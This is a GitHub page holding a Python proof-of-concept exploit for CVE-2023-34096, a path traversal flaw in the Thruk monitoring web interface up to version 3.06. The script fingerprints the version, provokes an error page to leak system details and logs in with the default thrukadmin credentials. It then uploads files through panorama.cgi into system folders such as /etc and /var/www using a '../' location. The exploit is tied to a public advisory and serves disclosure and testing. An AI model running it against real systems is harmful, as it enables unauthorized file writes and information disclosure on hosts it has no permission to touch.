-
Notifications
You must be signed in to change notification settings - Fork 1
/
CVE-2023-34096-exploit.py
executable file
·318 lines (264 loc) · 12.2 KB
/
CVE-2023-34096-exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
# Exploit Title: Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06
# Date: 08-Jun-2023
# Exploit Author: Galoget Latorre (@galoget)
# CVE: CVE-2023-34096 (Galoget Latorre)
# Vendor Homepage: https://thruk.org/
# Software Link: https://github.com/sni/Thruk/archive/refs/tags/v3.06.zip
# Software Link + Exploit + PoC (Backup): https://github.com/galoget/Thruk-CVE-2023-34096
# CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html
# GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h
# Affected Versions: <= 3.06
# Language: Python 3.x
# Tested on:
# - Ubuntu 22.04.5 LTS 64-bit
# - Debian GNU/Linux 10 (buster) 64-bit
# - Kali GNU/Linux 2023.1 64-bit
# - CentOS GNU/Linux 8.5.2111 64-bit
#!/usr/bin/python3
# -*- coding:utf-8 -*-
import sys
import warnings
import requests
from bs4 import BeautifulSoup
from termcolor import cprint
# Usage: python3 exploit.py <target.site>
# Example: python3 exploit.py http://127.0.0.1/thruk/
# Disable warnings
warnings.filterwarnings('ignore')
# Set headers
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
}
def banner():
"""
Function to print the banner
"""
banner_text = """
__ __ __ __ __ __ __ __ __ __
/ \\ /|_ __ _) / \\ _) _) __ _) |__| / \\ (__\\ /__
\\__ \\/ |__ /__ \\__/ /__ __) __) | \\__/ __/ \\__)
Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06
Exploit & CVE Author: Galoget Latorre (@galoget)
LinkedIn: https://www.linkedin.com/in/galoget
"""
print(banner_text)
def usage_instructions():
"""
Function that validates the number of arguments.
The application MUST have 2 arguments:
- [0]: Name of the script
- [1]: Target URL (Thruk Base URL)
"""
if len(sys.argv) != 2:
print("Usage: python3 exploit.py <target.site>")
print("Example: python3 exploit.py http://127.0.0.1/thruk/")
sys.exit(0)
def check_vulnerability(thruk_version):
"""
Function to check if the recovered version is vulnerable to CVE-2023-34096.
Prints additional information about the vulnerability.
"""
try:
if float(thruk_version[1:5]) <= 3.06:
if float(thruk_version[4:].replace("-", ".")) < 6.2:
cprint("[+] ", "green", attrs=['bold'], end = "")
print("This version of Thruk is ", end = "")
cprint("VULNERABLE ", "red", attrs=['bold'], end = "")
print("to CVE-2023-34096!")
print(" | CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html")
print(" | GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h")
print(" | CVE MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34096")
print(" | CVE NVD NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-34096")
print(" | Thruk Changelog: https://www.thruk.org/changelog.html")
print(" | Fixed version: 3.06-2+")
print("")
return True
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("It looks like this version of Thruk is NOT VULNERABLE to CVE-2023-34096.")
return False
except:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("There was an error parsing Thruk's version.\n")
return False
def get_thruk_version():
"""
Function to get Thruk's version via web scraping.
It also verifies the title of the website to check if the target is a Thruk instance.
"""
response = requests.get(target, headers=headers, allow_redirects=True, verify=False, timeout=10)
html_soup = BeautifulSoup(response.text, "html.parser")
if "<title>Thruk Monitoring Webinterface</title>" not in response.text:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("Verify if the URL is correct and points to a Thruk Monitoring Web Interface.")
sys.exit(-1)
else:
# Extract version anchor tag
version_link = html_soup.find_all("a", {"class": "link text-sm"})
if len(version_link) == 1 and version_link[0].has_attr('href'):
thruk_version = version_link[0].text.strip()
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"Detected Thruk Version (Public Banner): {thruk_version}\n")
return thruk_version
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("There was an error retrieving Thruk's version.")
sys.exit(-1)
def get_error_info():
"""
Function to cause an error in the target Thruk instance and collect additional information via web scraping.
"""
# URL that will cause an error
error_url = target + "//cgi-bin/login.cgi"
# Retrieve Any initial Cookies
error_response = requests.get(error_url,
headers=headers,
allow_redirects=False,
verify=False,
timeout=10)
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("Trying to retrieve additional information...\n")
try:
# Search for the error tag
html_soup = BeautifulSoup(error_response.text, "html.parser")
error_report = html_soup.find_all("pre", {"class": "text-left mt-5"})[0].text
if len(error_report) > 0:
# Print Error Info
error_report = error_report[error_report.find("Version"):error_report.find("\n\nStack")]
cprint("[+] ", "green", attrs=['bold'], end = "")
print("Recovered Information: \n")
parsed_error_report = error_report.split("\n")
for error_line in parsed_error_report:
print(f" {error_line}")
except:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("No additional information available.\n")
def get_thruk_session_auto_login():
"""
Function to login into the Thruk instance and retrieve a valid session.
It will use default Thruk's credentials available here:
- https://www.thruk.org/documentation/install.html
Change credentials if required.
"""
# Default Credentials - Change if required
username = "thrukadmin" # CHANGE ME
password = "thrukadmin" # CHANGE ME
params = {"login": username, "password": password}
cprint("[*] ", "blue", attrs=['bold'], end = "")
print(f"Trying to autenticate with provided credentials: {username}/{password}\n")
# Define Login URL
login_url = "cgi-bin/login.cgi"
session = requests.Session()
# Retrieve Any initial Cookies
session.get(target, headers=headers, allow_redirects=True, verify=False)
# Login and get thruk_auth Cookie
session.post(target + login_url, data=params, headers=headers, allow_redirects=False, verify=False)
# Get Cookies as dictionary
cookies = session.cookies.get_dict()
# Successful Login
if cookies.get('thruk_auth') is not None:
cprint("[+] ", "green", attrs=['bold'], end = "")
print("Successful Authentication!\n")
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"Login Cookie: thruk_auth={cookies.get('thruk_auth')}\n")
return session
# Failed Login
else:
if cookies.get('thruk_message') == "fail_message~~login%20failed":
cprint("[-] ", "red", attrs=['bold'], end = "")
print("Login Failed, check your credentials.")
sys.exit(401)
def cve_2023_34096_exploit_path_traversal(logged_session):
"""
Function that attempts to exploit the Path Traversal Vulnerability.
The exploit will try to upload a PoC file to multiple common folders.
This to prevent permissions errors to cause false negatives.
"""
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("Trying to exploit: ", end = "")
cprint("CVE-2023-34096 - Path Traversal\n", "yellow", attrs=['bold'])
# Define Upload URL
upload_url = "cgi-bin/panorama.cgi"
# Absolute paths
common_folders = ["/tmp/",
"/etc/thruk/plugins/plugins-enabled/",
"/etc/thruk/panorama/",
"/etc/thruk/bp/",
"/etc/thruk/thruk_local.d/",
"/var/www/",
"/var/www/html/",
"/etc/",
]
# Upload PoC file to each folder
for target_folder in common_folders:
# PoC file extension is jpg due to regex validations of Thruk.
# Nevertheless this issue can still cause damage in different ways to the affected instance.
files = {'image': ("exploit.jpg", "CVE-2023-34096-Exploit-PoC-by-galoget")}
data = {"task": "upload",
"type": "image",
"location": f"backgrounds/../../../..{target_folder}"
}
upload_response = logged_session.post(target + upload_url,
data=data,
files=files,
headers=headers,
allow_redirects=False,
verify=False)
try:
upload_response = upload_response.json()
if upload_response.get("msg") == "Upload successfull" and upload_response.get("success") is True:
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"File successfully uploaded to folder: {target_folder}{files.get('image')[0]}\n")
elif upload_response.get("msg") == "Fileupload must use existing and writable folder.":
cprint("[-] ", "red", attrs=['bold'], end = "")
print(f"File upload to folder \'{target_folder}{files.get('image')[0]}\' failed due to write permissions or non-existent folder!\n")
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("File upload failed.\n")
except:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("File upload failed.\n")
if __name__ == "__main__":
banner()
usage_instructions()
# Change this with the domain or IP address to attack
if sys.argv[1] and sys.argv[1].startswith("http"):
target = sys.argv[1]
else:
target = "http://127.0.0.1/thruk/"
# Prepare Base Target URL
if not target.endswith('/'):
target += "/"
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"Target URL: {target}\n")
# Get Thruk version via web scraping
scraped_thruk_version = get_thruk_version()
# Send a request that will generate an error and collect extra info
get_error_info()
# Check if the instance is vulnerable to CVE-2023-34096
vulnerable_status = check_vulnerability(scraped_thruk_version)
if vulnerable_status:
cprint("[+] ", "green", attrs=['bold'], end = "")
print("The Thruk version found in this host is vulnerable to CVE-2023-34096. Do you want to try to exploit it?")
# Confirm exploitation
option = input("\nChoice (Y/N): ").lower()
print("")
if option == "y":
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("The tool will attempt to exploit the vulnerability by uploading a PoC file to common folders...\n")
# Login into Thruk instance
valid_session = get_thruk_session_auto_login()
# Exploit Path Traversal Vulnerability
cve_2023_34096_exploit_path_traversal(valid_session)
elif option == "n":
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("No exploitation attempts were performed, Goodbye!\n")
sys.exit(0)
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("Unknown option entered.")
sys.exit(1)
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("The current Thruk's version is NOT VULNERABLE to CVE-2023-34096.")
sys.exit(2)